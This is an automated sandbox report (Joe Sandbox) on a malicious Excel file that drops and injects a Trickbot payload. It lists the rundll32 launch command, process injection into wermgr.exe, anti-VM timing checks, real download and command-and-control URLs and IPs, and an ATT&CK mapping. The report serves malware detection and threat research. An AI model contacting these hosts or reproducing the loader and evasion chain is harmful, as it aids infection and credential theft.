                Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\wermgr.exe C:\Windows\system32\wermgr.exe
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                Source: Binary string: F:\projects\cryptor_beta\Bin\Crypter\CrypterDllReleaseNoLogs\Win32\Crypter.pdb source: rundll32.exe, 00000004.00000002.2082692361.000000006E869000.00000002.00020000.sdmp, BASE.BABAA.0.dr
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00281BD0 push dword ptr [edx+14h]; ret
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00281C7A push dword ptr [edx+14h]; ret
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00281CFD push dword ptr [edx+14h]; ret
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_0007D0F0 push 8B48D233h; iretd
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\10[1].jjkesJump to dropped file
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\BASE.BABAAJump to dropped file
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\BASE.BABAAJump to dropped file
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\10[1].jjkesJump to dropped file
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\BASE.BABAAJump to dropped file

                Boot Survival:

                barindex
                Drops PE files to the user root directoryShow sources
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\BASE.BABAAJump to dropped file
                Source: C:\Windows\System32\wermgr.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion:

                barindex
                Found evasive API chain (trying to detect sleep duration tampering with parallel thread)Show sources
                Source: C:\Windows\System32\wermgr.exeFunction Chain: threadCreated,threadDelayed,threadDelayed,userTimerSet,threadDelayed,threadDelayed,fileVolumeQueried,adjustToken,handleClosed,systemQueried,systemQueried,threadDelayed,mutantCreated,threadInformationSet,threadInformationSet,languageOrLocalQueried,threadDelayed,threadDelayed,threadDelayed,threadInformationSet,threadInformationSet,systemQueried,systemQueried,fileOpened,directoryQueried
                Tries to detect virtualization through RDTSC time measurementsShow sources
                Source: C:\Windows\System32\wermgr.exeRDTSC instruction interceptor: First address: 000000000006EAD0 second address: 000000000006EAD0 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 dec eax 0x00000007 or eax, edx 0x00000009 ret 0x0000000a dec esp 0x0000000b mov edi, eax 0x0000000d call dword ptr [0000E3AEh] 0x00000013 jmp 00007F527C7F7B90h 0x00000015 jmp dword ptr [0007C47Ah] 0x0000001b mov ecx, dword ptr [7FFE0004h] 0x00000022 dec eax 0x00000023 mov eax, dword ptr [7FFE0320h] 0x0000002a dec eax 0x0000002b imul eax, ecx 0x0000002e dec eax 0x0000002f shr eax, 18h 0x00000032 ret 0x00000033 inc esp 0x00000034 mov esi, eax 0x00000036 dec ecx 0x00000037 mov esi, edi 0x00000039 dec eax 0x0000003a xor esi, FFFFFF00h 0x00000040 dec ecx 0x00000041 and esi, edi 0x00000043 call 00007F527C7EFA26h 0x00000048 rdtsc
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_0006EAD0 rdtsc
                Source: C:\Windows\System32\wermgr.exeCode function: GetAdaptersInfo,
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\10[1].jjkesJump to dropped file
                Source: C:\Windows\System32\wermgr.exeLast function: Thread delayed
                Source: C:\Windows\System32\wermgr.exeLast function: Thread delayed
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_00061290 FindFirstFileW,
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_000646F0 FindFirstFileW,FindNextFileW,
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_0006EAD0 rdtsc
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_00073070 LdrLoadDll,
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E85B044 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E85B044 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E857DE5 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_00082060 SleepEx,SetTimer,RtlAddVectoredExceptionHandler,

                HIPS / PFW / Operating System Protection Evasion:

                barindex
                Allocates memory in foreign processesShow sources
                Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: C:\Windows\System32\wermgr.exe base: 60000 protect: page execute and read and write
                Writes to foreign memory regionsShow sources
                Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\wermgr.exe base: 60000
                Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\wermgr.exe base: FFE193F8
                Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\BASE.BABAA,DllRegisterServer
                Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\wermgr.exe C:\Windows\system32\wermgr.exe
                Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\wermgr.exe C:\Windows\system32\wermgr.exe
                Source: wermgr.exe, 00000006.00000002.2343875253.0000000000750000.00000002.00000001.sdmpBinary or memory string: Program Manager
                Source: wermgr.exe, 00000006.00000002.2343875253.0000000000750000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
                Source: wermgr.exe, 00000006.00000002.2343875253.0000000000750000.00000002.00000001.sdmpBinary or memory string: !Progman
                Source: C:\Windows\System32\wermgr.exeQueries volume information: C:\ VolumeInformation

                Stealing of Sensitive Information:

                barindex
                Yara detected TrickbotShow sources
                Source: Yara matchFile source: Process Memory Space: wermgr.exe PID: 2892, type: MEMORY
                Yara detected TrickbotShow sources
                Source: Yara matchFile source: 00000004.00000002.2081720951.00000000005D8000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000003.2077502883.0000000000764000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2081503635.0000000000130000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000003.2077497175.0000000000764000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2081774299.0000000000730000.00000004.00000020.sdmp, type: MEMORY
                Source: Yara matchFile source: 4.2.rundll32.exe.130000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.rundll32.exe.130000.0.raw.unpack, type: UNPACKEDPE

                Remote Access Functionality:

                barindex
                Yara detected TrickbotShow sources
                Source: Yara matchFile source: Process Memory Space: wermgr.exe PID: 2892, type: MEMORY
                Yara detected TrickbotShow sources
                Source: Yara matchFile source: 00000004.00000002.2081720951.00000000005D8000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000003.2077502883.0000000000764000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2081503635.0000000000130000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000003.2077497175.0000000000764000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2081774299.0000000000730000.00000004.00000020.sdmp, type: MEMORY
                Source: Yara matchFile source: 4.2.rundll32.exe.130000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.rundll32.exe.130000.0.raw.unpack, type: UNPACKEDPE

                Mitre Att&ck Matrix

                Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                Valid AccountsScripting21Path InterceptionAccess Token Manipulation1Masquerading121OS Credential DumpingQuery Registry1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel22Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                Default AccountsNative API1Boot or Logon Initialization ScriptsProcess Injection212Disable or Modify Tools2LSASS MemorySecurity Software Discovery12Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer2Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                Domain AccountsExploitation for Client Execution33Logon Script (Windows)Extra Window Memory Injection1Access Token Manipulation1Security Account ManagerProcess Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection212NTDSSystem Network Configuration Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol113SIM Card SwapCarrier Billing Fraud
                Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptScripting21LSA SecretsFile and Directory Discovery2SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information2Cached Domain CredentialsSystem Information Discovery113VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                External Remote ServicesScheduled TaskStartup ItemsStartup ItemsRundll321DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobExtra Window Memory Injection1Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 signatures2 2 Behavior Graph ID: 355606 Sample: SecuriteInfo.com.Exploit.Si... Startdate: 20/02/2021 Architecture: WINDOWS Score: 100 38 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->38 40 Found malware configuration 2->40 42 Antivirus detection for URL or domain 2->42 44 11 other signatures 2->44 8 EXCEL.EXE 84 41 2->8         started        process3 dnsIp4 34 chipmania.it 185.81.0.78, 49165, 80 SERVERPLAN-ASIT Italy 8->34 36 www.chipmania.it 8->36 24 C:\Users\user\BASE.BABAA, PE32 8->24 dropped 26 C:\Users\user\AppData\Local\...\10[1].jjkes, PE32 8->26 dropped 50 Document exploit detected (process start blacklist hit) 8->50 52 Document exploit detected (UrlDownloadToFile) 8->52 13 rundll32.exe 8->13         started        file5 signatures6 process7 process8 15 rundll32.exe 13->15         started        signatures9 54 Writes to foreign memory regions 15->54 56 Allocates memory in foreign processes 15->56 18 wermgr.exe 15->18         started        21 wermgr.exe 4 2 15->21         started        process10 dnsIp11 46 Tries to detect virtualization through RDTSC time measurements 18->46 48 Found evasive API chain (trying to detect sleep duration tampering with parallel thread) 18->48 28 108.170.20.75, 443 SSASN2US United States 21->28 30 200.52.147.93, 443, 49170 RedesyTelecomunicacionesHN Honduras 21->30 32 142.202.191.164, 443, 49166 DYNUUS Reserved 21->32 signatures12

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                SecuriteInfo.com.Exploit.Siggen3.10350.13127.xls11%VirustotalBrowse

                Dropped Files

                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\10[1].jjkes11%MetadefenderBrowse
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\10[1].jjkes6%ReversingLabsWin32.Trojan.Trickpak
                C:\Users\user\BASE.BABAA11%MetadefenderBrowse
                C:\Users\user\BASE.BABAA6%ReversingLabsWin32.Trojan.Trickpak

                Unpacked PE Files

                No Antivirus matches

                Domains

                SourceDetectionScannerLabelLink
                chipmania.it1%VirustotalBrowse
                www.chipmania.it2%VirustotalBrowse

                URLs

                SourceDetectionScannerLabelLink
                http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
                http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
                http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
                http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
                http://www.icra.org/vocabulary/.0%URL Reputationsafe
                http://www.icra.org/vocabulary/.0%URL Reputationsafe
                http://www.icra.org/vocabulary/.0%URL Reputationsafe
                http://www.icra.org/vocabulary/.0%URL Reputationsafe
                http://ocsp.entrust.net030%URL Reputationsafe
                http://ocsp.entrust.net030%URL Reputationsafe
                http://ocsp.entrust.net030%URL Reputationsafe
                http://ocsp.entrust.net030%URL Reputationsafe
                https://142.202.191.164/rob60/320946_W617601.F9BBFBBC7DBF7A22FB7533B3DADD73B3/5/file/0%Avira URL Cloudsafe
                http://www.chipmania.it/mails/open.php5%VirustotalBrowse
                http://www.chipmania.it/mails/open.php100%Avira URL Cloudmalware
                https://200.52.147.93/rob60/320946_W617601.F9BBFBBC7DBF7A22FB7533B3DADD73B3/5/file//0%Avira URL Cloudsafe
                http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
                http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
                http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
                http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
                http://www.%s.comPA0%URL Reputationsafe
                http://www.%s.comPA0%URL Reputationsafe
                http://www.%s.comPA0%URL Reputationsafe
                http://www.%s.comPA0%URL Reputationsafe
                http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
                http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
                http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
                http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
                http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
                http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
                http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
                http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
                http://ocsp.entrust.net0D0%URL Reputationsafe
                http://ocsp.entrust.net0D0%URL Reputationsafe
                http://ocsp.entrust.net0D0%URL Reputationsafe
                http://ocsp.entrust.net0D0%URL Reputationsafe
                http://servername/isapibackend.dll0%Avira URL Cloudsafe
                https://200.52.147.93/rob60/320946_W617601.F9BBFBBC7DBF7A22FB7533B3DADD73B3/5/file/0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                chipmania.it
                185.81.0.78
                truefalseunknown
                www.chipmania.it
                unknown
                unknownfalseunknown

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://www.chipmania.it/mails/open.phptrue
                • 5%, Virustotal, Browse
                • Avira URL Cloud: malware
                unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkrundll32.exe, 00000003.00000002.2083207432.0000000001D37000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2082015096.0000000002317000.00000002.00000001.sdmp, wermgr.exe, 00000006.00000002.2349365108.0000000033AC7000.00000002.00000001.sdmpfalse
                  high
                  http://www.windows.com/pctv.wermgr.exe, 00000006.00000002.2349178856.00000000338E0000.00000002.00000001.sdmpfalse
                    high
                    http://investor.msn.comrundll32.exe, 00000003.00000002.2082979056.0000000001B50000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2081858418.0000000002130000.00000002.00000001.sdmp, wermgr.exe, 00000006.00000002.2349178856.00000000338E0000.00000002.00000001.sdmpfalse
                      high
                      http://www.msnbc.com/news/ticker.txtrundll32.exe, 00000003.00000002.2082979056.0000000001B50000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2081858418.0000000002130000.00000002.00000001.sdmp, wermgr.exe, 00000006.00000002.2349178856.00000000338E0000.00000002.00000001.sdmpfalse
                        high
                        http://crl.pkioverheid.nl/DomOvLatestCRL.crl0wermgr.exe, 00000006.00000002.2343795970.000000000026F000.00000004.00000020.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown
                        http://www.icra.org/vocabulary/.rundll32.exe, 00000003.00000002.2083207432.0000000001D37000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2082015096.0000000002317000.00000002.00000001.sdmp, wermgr.exe, 00000006.00000002.2349365108.0000000033AC7000.00000002.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown
                        http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.wermgr.exe, 00000006.00000002.2348794656.00000000334F0000.00000002.00000001.sdmpfalse
                          high
                          http://crl.entrust.net/server1.crl0wermgr.exe, 00000006.00000002.2343795970.000000000026F000.00000004.00000020.sdmpfalse
                            high
                            http://ocsp.entrust.net03wermgr.exe, 00000006.00000002.2343795970.000000000026F000.00000004.00000020.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            unknown
                            http://investor.msn.com/rundll32.exe, 00000003.00000002.2082979056.0000000001B50000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2081858418.0000000002130000.00000002.00000001.sdmp, wermgr.exe, 00000006.00000002.2349178856.00000000338E0000.00000002.00000001.sdmpfalse
                              high
                              https://142.202.191.164/rob60/320946_W617601.F9BBFBBC7DBF7A22FB7533B3DADD73B3/5/file/wermgr.exe, 00000006.00000002.2343779349.000000000024A000.00000004.00000020.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://200.52.147.93/rob60/320946_W617601.F9BBFBBC7DBF7A22FB7533B3DADD73B3/5/file//wermgr.exe, 00000006.00000002.2343761722.000000000021E000.00000004.00000020.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0wermgr.exe, 00000006.00000002.2343795970.000000000026F000.00000004.00000020.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              unknown
                              http://www.%s.comPAwermgr.exe, 00000006.00000002.2348794656.00000000334F0000.00000002.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              low
                              http://www.diginotar.nl/cps/pkioverheid0wermgr.exe, 00000006.00000002.2343795970.000000000026F000.00000004.00000020.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              unknown
                              http://windowsmedia.com/redir/services.asp?WMPFriendly=truerundll32.exe, 00000003.00000002.2083207432.0000000001D37000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2082015096.0000000002317000.00000002.00000001.sdmp, wermgr.exe, 00000006.00000002.2349365108.0000000033AC7000.00000002.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              unknown
                              http://www.hotmail.com/oerundll32.exe, 00000003.00000002.2082979056.0000000001B50000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2081858418.0000000002130000.00000002.00000001.sdmp, wermgr.exe, 00000006.00000002.2349178856.00000000338E0000.00000002.00000001.sdmpfalse
                                high
                                http://ocsp.entrust.net0Dwermgr.exe, 00000006.00000002.2343795970.000000000026F000.00000004.00000020.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                https://secure.comodo.com/CPS0wermgr.exe, 00000006.00000002.2343795970.000000000026F000.00000004.00000020.sdmpfalse
                                  high
                                  http://servername/isapibackend.dllwermgr.exe, 00000006.00000002.2349584225.0000000034050000.00000002.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  low
                                  http://crl.entrust.net/2048ca.crl0wermgr.exe, 00000006.00000002.2343795970.000000000026F000.00000004.00000020.sdmpfalse
                                    high
                                    https://200.52.147.93/rob60/320946_W617601.F9BBFBBC7DBF7A22FB7533B3DADD73B3/5/file/wermgr.exe, 00000006.00000002.2343826790.00000000002C1000.00000004.00000020.sdmp, wermgr.exe, 00000006.00000002.2343761722.000000000021E000.00000004.00000020.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown

                                    Contacted IPs

                                    • No. of IPs < 25%
                                    • 25% < No. of IPs < 50%
                                    • 50% < No. of IPs < 75%
                                    • 75% < No. of IPs

                                    Public

                                    IPDomainCountryFlagASNASN NameMalicious
                                    142.202.191.164
                                    unknownReserved
                                    398019DYNUUStrue
                                    108.170.20.75
                                    unknownUnited States
                                    20454SSASN2UStrue
                                    185.81.0.78
                                    unknownItaly
                                    52030SERVERPLAN-ASITfalse
                                    200.52.147.93
                                    unknownHonduras
                                    27932RedesyTelecomunicacionesHNtrue

                                    General Information

                                    Joe Sandbox Version:31.0.0 Emerald
                                    Analysis ID:355606
                                    Start date:20.02.2021
                                    Start time:03:16:16
                                    Joe Sandbox Product:CloudBasic
                                    Overall analysis duration:0h 7m 2s
                                    Hypervisor based Inspection enabled:false
                                    Report type:light
                                    Sample file name:SecuriteInfo.com.Exploit.Siggen3.10350.13127.32739 (renamed file extension from 32739 to xls)
                                    Cookbook file name:defaultwindowsofficecookbook.jbs
                                    Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                    Number of analysed new started processes analysed:8
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • HDC enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Detection:MAL
                                    Classification:mal100.troj.expl.evad.winXLS@9/11@1/4
                                    EGA Information:Failed
                                    HDC Information:
                                    • Successful, ratio: 7.6% (good quality ratio 4.8%)
                                    • Quality average: 58.5%
                                    • Quality standard deviation: 46.4%
                                    HCA Information:Failed
                                    Cookbook Comments:
                                    • Adjust boot time
                                    • Enable AMSI
                                    • Found Word or Excel or PowerPoint or XPS Viewer
                                    • Attach to Office via COM
                                    • Scroll down
                                    • Close Viewer
                                    Warnings:
                                    Show All
                                    • Exclude process from analysis (whitelisted): dllhost.exe
                                    • TCP Packets have been reduced to 100
                                    • Excluded IPs from analysis (whitelisted): 2.20.142.210, 2.20.142.209, 93.184.221.240
                                    • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, wu.ec.azureedge.net, audownload.windowsupdate.nsatc.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, wu.wpc.apr-52dd2.edgecastdns.net, au-bg-shim.trafficmanager.net, wu.azureedge.net

                                    Simulations

                                    Behavior and APIs

                                    TimeTypeDescription
                                    03:16:38API Interceptor1x Sleep call for process: rundll32.exe modified
                                    03:16:38API Interceptor7x Sleep call for process: wermgr.exe modified

                                    Joe Sandbox View / Context

                                    IPs

                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                    142.202.191.164SecuriteInfo.com.Exploit.Siggen3.10350.857.xlsGet hashmaliciousBrowse
                                      SecuriteInfo.com.Exploit.Siggen3.10350.26515.xlsGet hashmaliciousBrowse
                                        SecuriteInfo.com.Heur.1476.xlsGet hashmaliciousBrowse
                                          SecuriteInfo.com.Heur.2804.xlsGet hashmaliciousBrowse
                                            SecuriteInfo.com.Heur.18554.xlsGet hashmaliciousBrowse
                                              Sign-488964532_2104982999.xlsGet hashmaliciousBrowse
                                                SecuriteInfo.com.Heur.22173.xlsGet hashmaliciousBrowse
                                                  SecuriteInfo.com.Heur.28224.xlsGet hashmaliciousBrowse
                                                    Sign_1136845514-2138034493.xlsGet hashmaliciousBrowse
                                                      Sign_1229872171-1113140666(1).xlsGet hashmaliciousBrowse
                                                        SecuriteInfo.com.Exploit.Siggen3.10048.21670.xlsGet hashmaliciousBrowse
                                                          SecuriteInfo.com.Exploit.Siggen3.10048.24657.xlsGet hashmaliciousBrowse
                                                            SecuriteInfo.com.Exploit.Siggen3.10048.926.xlsGet hashmaliciousBrowse
                                                              SecuriteInfo.com.Exploit.Siggen3.10048.21627.xlsGet hashmaliciousBrowse
                                                                upload-1015096714-954471831.xlsGet hashmaliciousBrowse
                                                                  SecuriteInfo.com.Exploit.Siggen3.10048.18578.xlsGet hashmaliciousBrowse
                                                                    SecuriteInfo.com.Heur.31861.xlsGet hashmaliciousBrowse
